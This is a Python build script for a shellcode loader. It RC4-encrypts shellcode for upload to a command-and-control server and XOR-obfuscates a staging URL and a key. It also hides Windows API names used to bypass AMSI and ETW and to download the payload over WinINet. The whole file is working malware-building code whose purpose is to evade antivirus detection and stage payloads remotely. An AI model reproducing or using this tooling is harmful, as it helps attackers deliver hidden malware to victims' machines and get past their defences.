#!/usr/bin/env python3
"""
Encrypt.py - Shellcode Encryption & Build Randomizer

Usage:
  python Encrypt.py <shellcode.bin> --url https://your-server/data.enc

Generates:
  data.enc  - RC4-encrypted shellcode (upload to C2)
  Payload.h - Encryption params + randomized string obfuscation
"""

import sys
import os
import random

# All sensitive strings — XOR key is randomized each run
OBFUSCATED_STRINGS = {
    # Evasion.c
    "XSTR_NTDLL_DLL":               "ntdll.dll",
    "XSTR_ETW_EVENT_WRITE":         "EtwEventWrite",
    "XSTR_AMSI_DLL":                "amsi.dll",
    "XSTR_AMSI_SCAN_BUFFER":        "AmsiScanBuffer",
    # Crypt.c
    "XSTR_ADVAPI32_DLL":            "advapi32.dll",
    "XSTR_SYSTEM_FUNCTION032":      "SystemFunction032",
    # Staging.c
    "XSTR_WININET_DLL":             "wininet.dll",
    "XSTR_INTERNET_OPEN_A":         "InternetOpenA",
    "XSTR_INTERNET_CONNECT_A":      "InternetConnectA",
    "XSTR_HTTP_OPEN_REQUEST_A":     "HttpOpenRequestA",
    "XSTR_HTTP_SEND_REQUEST_A":     "HttpSendRequestA",
    "XSTR_INTERNET_READ_FILE":      "InternetReadFile",
    "XSTR_INTERNET_CLOSE_HANDLE":   "InternetCloseHandle",
    "XSTR_INTERNET_SET_OPTION_A":   "InternetSetOptionA",
    "XSTR_INTERNET_QUERY_OPTION_A": "InternetQueryOptionA",
    "XSTR_USER_AGENT":              "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "XSTR_HTTP_GET":                "GET",
}


def rc4_crypt(data: bytes, key: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    i = j = 0
    result = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        result.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(result)


def generate_protected_key(key: bytes) -> tuple:
    b = random.randint(1, 255)
    protected = bytearray()
    for i, byte_val in enumerate(key):
        protected.append(((byte_val + i) ^ b) & 0xFF)
    return bytes(protected), b


def pick_xor_key(strings_dict):
    """Pick a random XOR key that won't produce 0x00 in any encoded string."""
    all_chars = set()
    for s in strings_dict.values():
        for c in s.encode('ascii'):
            all_chars.add(c)
    valid = [k for k in range(1, 256) if k not in all_chars]
    return random.choice(valid)


def xor_encode_string(s, key):
    """XOR-encode string bytes, append raw 0x00 terminator."""
    encoded = [(b ^ key) & 0xFF for b in s.encode('ascii')]
    encoded.append(0x00)
    return encoded


def format_initializer(name, data, items_per_line=16):
    """Format as #define NAME { 0x.., ... }"""
    if len(data) <= items_per_line:
        vals = ", ".join(f"0x{b:02X}" for b in data)
        return f"#define {name} {{ {vals} }}"

    lines = [f"#define {name} {{ \\"]
    for i in range(0, len(data), items_per_line):
        chunk = data[i:i + items_per_line]
        vals = ", ".join(f"0x{b:02X}" for b in chunk)
        if i + items_per_line < len(data):
            lines.append(f"    {vals}, \\")
        else:
            lines.append(f"    {vals} \\")
    lines.append("}")
    return "\n".join(lines)


def main():
    if len(sys.argv) < 4 or "--url" not in sys.argv:
        print(f"Usage: {sys.argv[0]} <shellcode.bin> --url https://server/data.enc")
        sys.exit(1)

    shellcode_path = sys.argv[1]
    idx = sys.argv.index("--url")
    staging_url = sys.argv[idx + 1]

    with open(shellcode_path, "rb") as f:
        shellcode = f.read()

    print(f"[*] Shellcode: {len(shellcode)} bytes ({len(shellcode)/1024/1024:.1f} MB)")

    key_size = 16
    rc4_key = bytes(random.randint(0, 255) for _ in range(key_size))
    hint_byte = rc4_key[0]

    print(f"[*] Encrypting...")
    encrypted = rc4_crypt(shellcode, rc4_key)
    protected_key, brute_byte = generate_protected_key(rc4_key)

    script_dir = os.path.dirname(os.path.abspath(__file__))

    # Write encrypted payload
    enc_path = os.path.join(script_dir, "data.enc")
    with open(enc_path, "wb") as f:
        f.write(encrypted)
    print(f"[+] data.enc: {len(encrypted)} bytes")

    # Pick random XOR key for string obfuscation
    xkey = pick_xor_key(OBFUSCATED_STRINGS)
    print(f"[+] XKEY: 0x{xkey:02X}")

    # XOR-encode the URL
    url_bytes = staging_url.encode() + b'\x00'
    url_xor_key = random.randint(1, 255)
    xored_url = bytes([(b ^ url_xor_key) & 0xFF for b in url_bytes])

    # --- Generate Payload.h ---
    lines = []
    lines.append("#pragma once")
    lines.append("")
    lines.append("// Auto-generated by Encrypt.py — do not edit")
    lines.append("// Randomized values change every build")
    lines.append("")
    lines.append(f"#define PAYLOAD_SIZE    {len(shellcode)}")
    lines.append(f"#define KEY_SIZE        {key_size}")
    lines.append(f"#define HINT_BYTE       0x{hint_byte:02X}")
    lines.append(f"#define URL_XOR_KEY     0x{url_xor_key:02X}")
    lines.append(f"#define URL_LENGTH      {len(url_bytes)}")
    lines.append("")
    lines.append("// String obfuscation key (randomized per build)")
    lines.append(f"#define XKEY            0x{xkey:02X}")
    lines.append("")
    lines.append(format_initializer("INIT_ENCODED_URL", xored_url))
    lines.append("")
    lines.append(format_initializer("INIT_PROTECTED_KEY", protected_key))
    lines.append("")

    # Obfuscated API/DLL strings
    lines.append("// Obfuscated strings (XOR-encoded, randomized per build)")
    for name, plaintext in OBFUSCATED_STRINGS.items():
        encoded = xor_encode_string(plaintext, xkey)
        lines.append(format_initializer(name, encoded))
    lines.append("")

    with open(os.path.join(script_dir, "Payload.h"), "w") as f:
        f.write("\n".join(lines) + "\n")
    print(f"[+] Payload.h generated")

    # Verify encryption
    recovered = bytearray()
    b = 0
    while ((protected_key[0] ^ b) - 0) != hint_byte:
        b += 1
    for i in range(key_size):
        recovered.append(((protected_key[i] ^ b) - i) & 0xFF)
    assert bytes(recovered) == rc4_key
    assert rc4_crypt(encrypted, bytes(recovered)) == shellcode
    print(f"[+] Verification PASSED")

    # Verify string obfuscation
    first_name = list(OBFUSCATED_STRINGS.keys())[0]
    first_plain = OBFUSCATED_STRINGS[first_name]
    first_encoded = xor_encode_string(first_plain, xkey)
    for i, byte_val in enumerate(first_encoded[:-1]):
        assert (byte_val ^ xkey) == first_plain.encode('ascii')[i]
    print(f"[+] String obfuscation verified")

    print(f"\n[*] Upload data.enc to: {staging_url}")
    print(f"[*] Then build: build.bat")


if __name__ == "__main__":
    main()
